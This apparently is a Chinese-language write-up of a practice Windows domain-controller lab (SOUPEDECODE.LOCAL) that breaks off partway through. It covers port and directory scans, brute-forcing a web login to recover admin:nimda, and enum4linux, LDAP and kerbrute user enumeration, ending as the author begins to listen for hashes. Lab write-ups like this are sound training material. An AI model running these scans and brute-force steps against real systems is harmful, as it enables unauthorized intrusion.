![\"image-20250610235313724\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757864.png\")
<\/div>\n
![\"image-20250613122404573\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757866.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.103:53\nOpen 192.168.10.103:80\nOpen 192.168.10.103:88\nOpen 192.168.10.103:135\nOpen 192.168.10.103:139\nOpen 192.168.10.103:389\nOpen 192.168.10.103:445\nOpen 192.168.10.103:464\nOpen 192.168.10.103:593\nOpen 192.168.10.103:636\nOpen 192.168.10.103:3268\nOpen 192.168.10.103:3269\nOpen 192.168.10.103:5985\nOpen 192.168.10.103:9389\nOpen 192.168.10.103:49664\nOpen 192.168.10.103:49669\nOpen 192.168.10.103:49670\nOpen 192.168.10.103:49679\nOpen 192.168.10.103:49721\n\nPORT STATE SERVICE REASON VERSION\n53\/tcp open domain syn-ack ttl 128 Simple DNS Plus\n80\/tcp open http syn-ack ttl 128 Apache httpd 2.4.58 ((Win64) OpenSSL\/3.1.3 PHP\/8.2.12)\n|_http-title: Did not follow redirect to http:\/\/soupedecode.local\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n88\/tcp open kerberos-sec syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-13 20:28:35Z)\n135\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn\n389\/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp open microsoft-ds? syn-ack ttl 128\n464\/tcp open kpasswd5? syn-ack ttl 128\n593\/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n636\/tcp open tcpwrapped syn-ack ttl 128\n3268\/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n3269\/tcp open tcpwrapped syn-ack ttl 128\n5985\/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp open mc-nmf syn-ack ttl 128 .NET Message Framing\n49664\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49669\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49670\/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n49679\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49721\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:12:E9:22 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 56573\/tcp): CLEAN (Timeout)\n| Check 2 (port 63368\/tcp): CLEAN (Timeout)\n| Check 3 (port 11187\/udp): CLEAN (Timeout)\n| Check 4 (port 53121\/udp): CLEAN (Timeout)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 16h00m01s\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled and required\n| nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:12:e9:22 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n| SOUPEDECODE<1c> Flags: <group><active>\n| SOUPEDECODE<00> Flags: <group><active>\n| DC01<00> Flags: <unique><active>\n| DC01<20> Flags: <unique><active>\n| SOUPEDECODE<1b> Flags: <unique><active>\n| Statistics:\n| 08:00:27:12:e9:22:00:00:00:00:00:00:00:00:00:00:00\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n| date: 2025-06-13T20:29:24\n|_ start_date: N\/A<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n403 GET 9l 30w 305c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404 GET 9l 33w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/ => http:\/\/soupedecode.local\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/index.php => http:\/\/soupedecode.local\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/Index.php => http:\/\/soupedecode.local\n503 GET 11l 44w 405c http:\/\/192.168.10.103\/examples\n301 GET 9l 30w 350c http:\/\/192.168.10.103\/licenses => http:\/\/192.168.10.103:8080\/licenses\/\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/INDEX.php => http:\/\/soupedecode.local\n[#>------------------] - 2m 73410\/882188 15m found:6 errors:44 \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_192_168_10_103_-1749788849.state ...\n[#>------------------] - 2m 73434\/882188 15m found:6 errors:44 \n[#>------------------] - 2m 73396\/882184 696\/s http:\/\/192.168.10.103\/<\/code><\/pre>\n\u6dfb\u52a0\u4e00\u4e2adns\u89e3\u6790\uff1a<\/p>\n
192.168.10.103 soupedecode.local<\/code><\/pre>\n\u518d\u626b\u63cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ feroxbuster -u http:\/\/soupedecode.local\/ -x html txt php 2>\/dev\/null \n\n403 GET 9l 30w 308c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404 GET 9l 33w 305c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302 GET 0l 0w 0c http:\/\/soupedecode.local\/ => http:\/\/soupedecode.local\n302 GET 0l 0w 0c http:\/\/soupedecode.local\/index.php => http:\/\/soupedecode.local\n503 GET 11l 44w 408c http:\/\/soupedecode.local\/examples\n301 GET 9l 30w 356c http:\/\/soupedecode.local\/licenses => http:\/\/soupedecode.local:8080\/licenses\/\n200 GET 610l 1250w 38994c http:\/\/soupedecode.local\/server-status\n302 GET 0l 0w 0c http:\/\/soupedecode.local\/Index.php => http:\/\/soupedecode.local\n200 GET 1169l 7264w 102074c http:\/\/soupedecode.local\/server-info\n[####################] - 2m 120060\/120060 0s found:7 errors:0 \n[####################] - 2m 120000\/120000 1097\/s http:\/\/soupedecode.local\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u654f\u611f\u76ee\u5f55<\/h3>\n
![\"image-20250613123713021\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e86\u65b0\u7684\u57df\u540d\u89e3\u6790\uff0c\u6dfb\u52a0\u4e00\u4e0b\uff1a<\/p>\n
192.168.10.103 heartbeat.soupedecode.local<\/code><\/pre>\n\u7206\u7834\u767b\u5f55\u754c\u9762<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u5148\u6293\u4e2a\u5305\uff0c\u770b\u770b\u6709\u6ca1\u6709\u5565\u5ef6\u7533\uff1a<\/p>\n
POST \/login.php HTTP\/1.1\nHost: heartbeat.soupedecode.local\nContent-Length: 32\nCache-Control: max-age=0\nAccept-Language: en-US,en;q=0.9\nOrigin: http:\/\/heartbeat.soupedecode.local\nContent-Type: application\/x-www-form-urlencoded\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/136.0.0.0 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/heartbeat.soupedecode.local\/login.php\nAccept-Encoding: gzip, deflate, br\nCookie: PHPSESSID=5d46ucrej014bk99jhriirrfa2\nConnection: keep-alive\n\nusername=admin&password=password<\/code><\/pre>\n\u5c1d\u8bd5sql\u6ce8\u5165\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002\u3002\u53ea\u80fd\u5c1d\u8bd5\u7206\u7834\u4e86\u3002\u3002\u3002\u3002\u53d1\u73b0\u4ed6\u662f\u4e0d\u6b63\u5e38\u54cd\u5e94\u7684\uff0c\u5c31\u662f\u8bf4\u8fd4\u56de\u6ca1\u62a5\u9519\u63d0\u793a\u7684\u3002\u3002\u3002<\/p>\n
<\/div>
\n<\/div><\/p>\n\u4e00\u76f4\u51fa\u73b0403<\/code>\u5c31\u574f\u4e8b\u4e86\u3002\u3002\u3002\u3002\u91cd\u542f\u9776\u673a\u90fd\u6ca1\u7528\uff0c\u53ea\u80fd\u91cd\u65b0\u5bfc\u5165\uff0c\u5c1d\u8bd5\u52a0\u4e2a\u5feb\u7167\uff0c\u8fd9\u4f5c\u8005\u51fa\u7684\u51e0\u4e2a windows\u00b7\u9776\u673a\u90fd\u5bb9\u6613\u51fa\u73b0\u5947\u5947\u602a\u602a\u7684\u95ee\u9898\u53ef\u89c1 windows\u9776\u673a\u7684\u591a\u53d8\u6027\u3002\u3002\u3002\u3002<\/p>\n<\/div><\/p>\n\u7b2c\u4e8c\u4e2a\u9009\u9879\uff0c\u6211\u62cd\u8fc7\u5feb\u7167\u4e86\uff0c\u6240\u4ee5\u70b9\u4e0d\u4e86\uff0c\u6b63\u5e38\u662f\u53ef\u4ee5\u70b9\u7684\uff01\u7136\u540e\u8bb0\u5f97\u4fee\u6539dns<\/code>\u89e3\u6790:<\/p>\n<\/div><\/p>\n\u5bc6\u7801\u9519\u8bef\u4f1a\u51fa\u73b0\u4ee5\u4e0bInvalid username or password.<\/code>\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u8fd9\u6837\u5c31\u5bf9\u4e86\uff01\uff01\uff01\u6211\u8fd9\u8fb9\u77e5\u9053\u4e0d\u591a\u6211\u5c31\u7528 kali \u7684\u514d\u8d39\u7248 burp \u4e86\uff0c\u4f1a\u7206\u7834\u5f88\u6162\uff0c\u53ef\u4ee5\u7528\u4e3b\u673a\u4e13\u4e1a\u7248\u8fdb\u884c\u7206\u7834\u4f1a\u6bd4\u8f83\u5feb\uff0c\u5982\u679c\u6b7b\u673a\u4e86\u5c31\u6062\u590d\u5feb\u7167\uff0c\u63a5\u7740\u7206\u7834\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u4e00\u4e0b\u54cd\u5e94\u5305\uff1a<\/p>\n
HTTP\/1.1 200 OK\nDate: Fri, 13 Jun 2025 23:04:23 GMT\nServer: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\nX-Powered-By: PHP\/8.2.12\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nSet-Cookie: user=admin; expires=Sat, 14 Jun 2025 00:04:23 GMT; Max-Age=3600; path=\/\nRefresh: 0; url=app.php\nContent-Length: 1913\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\/html; charset=UTF-8\n\n<!DOCTYPE html>\n<html lang="en">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <title>Login<\/title>\n <style>\n body {\n font-family: Arial, sans-serif;\n background-color: #f9f9f9;\n display: flex;\n justify-content: center;\n align-items: center;\n height: 100vh;\n margin: 0;\n }\n .container {\n background-color: #fff;\n padding: 20px;\n border-radius: 8px;\n box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);\n width: 300px;\n text-align: center;\n }\n input[type="text"], input[type="password"], input[type="submit"] {\n padding: 10px;\n margin: 10px 0;\n border: 1px solid #ccc;\n border-radius: 4px;\n width: 100%;\n }\n input[type="submit"] {\n background-color: #007bff;\n color: #fff;\n cursor: pointer;\n }\n input[type="submit"]:hover {\n background-color: #0056b3;\n }\n .message {\n padding: 10px;\n margin-top: 10px;\n border-radius: 4px;\n }\n .success {\n background-color: #d4edda;\n color: #155724;\n }\n .error {\n background-color: #f8d7da;\n color: #721c24;\n }\n <\/style>\n<\/head>\n<body>\n\n<div class="container">\n <h2>Login<\/h2>\n <form method="post" action="">\n <input type="text" name="username" placeholder="Username" required>\n <input type="password" name="password" placeholder="Password" required>\n <input type="submit" value="Login">\n <\/form>\n\n <p class="message success">Login successful! Redirecting...<\/p><\/div>\n\n<\/body>\n<\/html>\n<\/code><\/pre>\n\u5f88\u660e\u663e\u7206\u7834\u6210\u529f\u4e86\uff01\u5f97\u5230\u4e00\u4e2a\u51ed\u8bc1admin:nimda<\/code><\/p>\n\u654f\u611f\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\nsmb\u670d\u52a1<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ enum4linux -a $IP \nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Fri Jun 13 03:06:42 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: SOUPEDECODE\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n DC01 <00> - B <ACTIVE> Workstation Service\n SOUPEDECODE <00> - <GROUP> B <ACTIVE> Domain\/Workgroup Name\n SOUPEDECODE <1c> - <GROUP> B <ACTIVE> Domain Controllers\n DC01 <20> - B <ACTIVE> File Server Service\n SOUPEDECODE <1b> - B <ACTIVE> Domain Master Browser\n\n MAC Address = 08-00-27-66-BA-0F\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.<\/code><\/pre>\nLDAP<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nmap -n -sV --script "ldap* and not brute" $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-13 03:07 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00092s latency).\nNot shown: 987 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n53\/tcp open domain Simple DNS Plus\n80\/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL\/3.1.3 PHP\/8.2.12)\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\n88\/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-13 23:07:23Z)\n135\/tcp open msrpc Microsoft Windows RPC\n139\/tcp open netbios-ssn Microsoft Windows netbios-ssn\n389\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n| <ROOT>\n| domainFunctionality: 7\n| forestFunctionality: 7\n| domainControllerFunctionality: 7\n| rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n| isGlobalCatalogReady: TRUE\n| supportedSASLMechanisms: GSSAPI\n| supportedSASLMechanisms: GSS-SPNEGO\n| supportedSASLMechanisms: EXTERNAL\n| supportedSASLMechanisms: DIGEST-MD5\n| supportedLDAPVersion: 3\n| supportedLDAPVersion: 2\n| supportedLDAPPolicies: MaxPoolThreads\n| supportedLDAPPolicies: MaxPercentDirSyncRequests\n| supportedLDAPPolicies: MaxDatagramRecv\n| supportedLDAPPolicies: MaxReceiveBuffer\n| supportedLDAPPolicies: InitRecvTimeout\n| supportedLDAPPolicies: MaxConnections\n| supportedLDAPPolicies: MaxConnIdleTime\n| supportedLDAPPolicies: MaxPageSize\n| supportedLDAPPolicies: MaxBatchReturnMessages\n| supportedLDAPPolicies: MaxQueryDuration\n| supportedLDAPPolicies: MaxDirSyncDuration\n| supportedLDAPPolicies: MaxTempTableSize\n| supportedLDAPPolicies: MaxResultSetSize\n| supportedLDAPPolicies: MinResultSets\n| supportedLDAPPolicies: MaxResultSetsPerConn\n| supportedLDAPPolicies: MaxNotificationPerConn\n| supportedLDAPPolicies: MaxValRange\n| supportedLDAPPolicies: MaxValRangeTransitive\n| supportedLDAPPolicies: ThreadMemoryLimit\n| supportedLDAPPolicies: SystemMemoryLimitPercent\n| supportedControl: 1.2.840.113556.1.4.319\n| supportedControl: 1.2.840.113556.1.4.801\n| supportedControl: 1.2.840.113556.1.4.473\n| supportedControl: 1.2.840.113556.1.4.528\n| supportedControl: 1.2.840.113556.1.4.417\n| supportedControl: 1.2.840.113556.1.4.619\n| supportedControl: 1.2.840.113556.1.4.841\n| supportedControl: 1.2.840.113556.1.4.529\n| supportedControl: 1.2.840.113556.1.4.805\n| supportedControl: 1.2.840.113556.1.4.521\n| supportedControl: 1.2.840.113556.1.4.970\n| supportedControl: 1.2.840.113556.1.4.1338\n| supportedControl: 1.2.840.113556.1.4.474\n| supportedControl: 1.2.840.113556.1.4.1339\n| supportedControl: 1.2.840.113556.1.4.1340\n| supportedControl: 1.2.840.113556.1.4.1413\n| supportedControl: 2.16.840.1.113730.3.4.9\n| supportedControl: 2.16.840.1.113730.3.4.10\n| supportedControl: 1.2.840.113556.1.4.1504\n| supportedControl: 1.2.840.113556.1.4.1852\n| supportedControl: 1.2.840.113556.1.4.802\n| supportedControl: 1.2.840.113556.1.4.1907\n| supportedControl: 1.2.840.113556.1.4.1948\n| supportedControl: 1.2.840.113556.1.4.1974\n| supportedControl: 1.2.840.113556.1.4.1341\n| supportedControl: 1.2.840.113556.1.4.2026\n| supportedControl: 1.2.840.113556.1.4.2064\n| supportedControl: 1.2.840.113556.1.4.2065\n| supportedControl: 1.2.840.113556.1.4.2066\n| supportedControl: 1.2.840.113556.1.4.2090\n| supportedControl: 1.2.840.113556.1.4.2205\n| supportedControl: 1.2.840.113556.1.4.2204\n| supportedControl: 1.2.840.113556.1.4.2206\n| supportedControl: 1.2.840.113556.1.4.2211\n| supportedControl: 1.2.840.113556.1.4.2239\n| supportedControl: 1.2.840.113556.1.4.2255\n| supportedControl: 1.2.840.113556.1.4.2256\n| supportedControl: 1.2.840.113556.1.4.2309\n| supportedControl: 1.2.840.113556.1.4.2330\n| supportedControl: 1.2.840.113556.1.4.2354\n| supportedCapabilities: 1.2.840.113556.1.4.800\n| supportedCapabilities: 1.2.840.113556.1.4.1670\n| supportedCapabilities: 1.2.840.113556.1.4.1791\n| supportedCapabilities: 1.2.840.113556.1.4.1935\n| supportedCapabilities: 1.2.840.113556.1.4.2080\n| supportedCapabilities: 1.2.840.113556.1.4.2237\n| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| isSynchronized: TRUE\n| highestCommittedUSN: 77859\n| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| dnsHostName: DC01.SOUPEDECODE.LOCAL\n| defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| currentTime: 20250613230723.0Z\n|_ configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n445\/tcp open microsoft-ds?\n464\/tcp open kpasswd5?\n593\/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0\n636\/tcp open tcpwrapped\n3268\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n| <ROOT>\n| domainFunctionality: 7\n| forestFunctionality: 7\n| domainControllerFunctionality: 7\n| rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n| isGlobalCatalogReady: TRUE\n| supportedSASLMechanisms: GSSAPI\n| supportedSASLMechanisms: GSS-SPNEGO\n| supportedSASLMechanisms: EXTERNAL\n| supportedSASLMechanisms: DIGEST-MD5\n| supportedLDAPVersion: 3\n| supportedLDAPVersion: 2\n| supportedLDAPPolicies: MaxPoolThreads\n| supportedLDAPPolicies: MaxPercentDirSyncRequests\n| supportedLDAPPolicies: MaxDatagramRecv\n| supportedLDAPPolicies: MaxReceiveBuffer\n| supportedLDAPPolicies: InitRecvTimeout\n| supportedLDAPPolicies: MaxConnections\n| supportedLDAPPolicies: MaxConnIdleTime\n| supportedLDAPPolicies: MaxPageSize\n| supportedLDAPPolicies: MaxBatchReturnMessages\n| supportedLDAPPolicies: MaxQueryDuration\n| supportedLDAPPolicies: MaxDirSyncDuration\n| supportedLDAPPolicies: MaxTempTableSize\n| supportedLDAPPolicies: MaxResultSetSize\n| supportedLDAPPolicies: MinResultSets\n| supportedLDAPPolicies: MaxResultSetsPerConn\n| supportedLDAPPolicies: MaxNotificationPerConn\n| supportedLDAPPolicies: MaxValRange\n| supportedLDAPPolicies: MaxValRangeTransitive\n| supportedLDAPPolicies: ThreadMemoryLimit\n| supportedLDAPPolicies: SystemMemoryLimitPercent\n| supportedControl: 1.2.840.113556.1.4.319\n| supportedControl: 1.2.840.113556.1.4.801\n| supportedControl: 1.2.840.113556.1.4.473\n| supportedControl: 1.2.840.113556.1.4.528\n| supportedControl: 1.2.840.113556.1.4.417\n| supportedControl: 1.2.840.113556.1.4.619\n| supportedControl: 1.2.840.113556.1.4.841\n| supportedControl: 1.2.840.113556.1.4.529\n| supportedControl: 1.2.840.113556.1.4.805\n| supportedControl: 1.2.840.113556.1.4.521\n| supportedControl: 1.2.840.113556.1.4.970\n| supportedControl: 1.2.840.113556.1.4.1338\n| supportedControl: 1.2.840.113556.1.4.474\n| supportedControl: 1.2.840.113556.1.4.1339\n| supportedControl: 1.2.840.113556.1.4.1340\n| supportedControl: 1.2.840.113556.1.4.1413\n| supportedControl: 2.16.840.1.113730.3.4.9\n| supportedControl: 2.16.840.1.113730.3.4.10\n| supportedControl: 1.2.840.113556.1.4.1504\n| supportedControl: 1.2.840.113556.1.4.1852\n| supportedControl: 1.2.840.113556.1.4.802\n| supportedControl: 1.2.840.113556.1.4.1907\n| supportedControl: 1.2.840.113556.1.4.1948\n| supportedControl: 1.2.840.113556.1.4.1974\n| supportedControl: 1.2.840.113556.1.4.1341\n| supportedControl: 1.2.840.113556.1.4.2026\n| supportedControl: 1.2.840.113556.1.4.2064\n| supportedControl: 1.2.840.113556.1.4.2065\n| supportedControl: 1.2.840.113556.1.4.2066\n| supportedControl: 1.2.840.113556.1.4.2090\n| supportedControl: 1.2.840.113556.1.4.2205\n| supportedControl: 1.2.840.113556.1.4.2204\n| supportedControl: 1.2.840.113556.1.4.2206\n| supportedControl: 1.2.840.113556.1.4.2211\n| supportedControl: 1.2.840.113556.1.4.2239\n| supportedControl: 1.2.840.113556.1.4.2255\n| supportedControl: 1.2.840.113556.1.4.2256\n| supportedControl: 1.2.840.113556.1.4.2309\n| supportedControl: 1.2.840.113556.1.4.2330\n| supportedControl: 1.2.840.113556.1.4.2354\n| supportedCapabilities: 1.2.840.113556.1.4.800\n| supportedCapabilities: 1.2.840.113556.1.4.1670\n| supportedCapabilities: 1.2.840.113556.1.4.1791\n| supportedCapabilities: 1.2.840.113556.1.4.1935\n| supportedCapabilities: 1.2.840.113556.1.4.2080\n| supportedCapabilities: 1.2.840.113556.1.4.2237\n| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| isSynchronized: TRUE\n| highestCommittedUSN: 77859\n| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| dnsHostName: DC01.SOUPEDECODE.LOCAL\n| defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| currentTime: 20250613230723.0Z\n|_ configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n3269\/tcp open tcpwrapped\n5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nMAC Address: 08:00:27:66:BA:0F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.65 seconds<\/code><\/pre>\n\u7206\u7834kerberos\u670d\u52a1<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ ..\/DC02\/kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc $IP \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt\n\n __ __ __ \n \/ \/_____ _____\/ \/_ _______ __\/ \/____ \n \/ \/\/_\/ _ \\\/ ___\/ __ \\\/ ___\/ \/ \/ \/ __\/ _ \\\n \/ ,< \/ __\/ \/ \/ \/_\/ \/ \/ \/ \/_\/ \/ \/_\/ __\/\n\/_\/|_|\\___\/_\/ \/_.___\/_\/ \\__,_\/\\__\/\\___\/ \n\nVersion: v1.0.3 (9dad6e1) - 06\/13\/25 - Ronnie Flathers @ropnop\n\n2025\/06\/13 03:11:28 > Using KDC(s):\n2025\/06\/13 03:11:28 > 192.168.10.101:88\n\n2025\/06\/13 03:11:29 > [+] VALID USERNAME: administrator@SOUPEDECODE.LOCAL\n2025\/06\/13 03:11:34 > [+] VALID USERNAME: Administrator@SOUPEDECODE.LOCAL\n^C<\/code><\/pre>\n\u627e\u4e0d\u5230\u5c31\u522b\u786c\u627e\u4e86\u3002\u3002\u3002<\/p>\n
UDP\u4fe1\u606f\u641c\u96c6<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo nmap -Pn -sU -F $IP --max-rate 50 --min-rate 15\n[sudo] password for kali: \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-13 03:14 EDT\nNmap scan report for soupedecode.local (192.168.10.101)\nHost is up (0.00088s latency).\nNot shown: 96 open|filtered udp ports (no-response)\nPORT STATE SERVICE\n53\/udp open domain\n88\/udp open kerberos-sec\n123\/udp open ntp\n137\/udp open netbios-ns\nMAC Address: 08:00:27:66:BA:0F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 5.30 seconds<\/code><\/pre>\n\u76d1\u542c\u4e00\u4e0b\u770b\u770b\u662f\u5426\u4f20\u56de\u6765hash\uff1a<\/p>\n
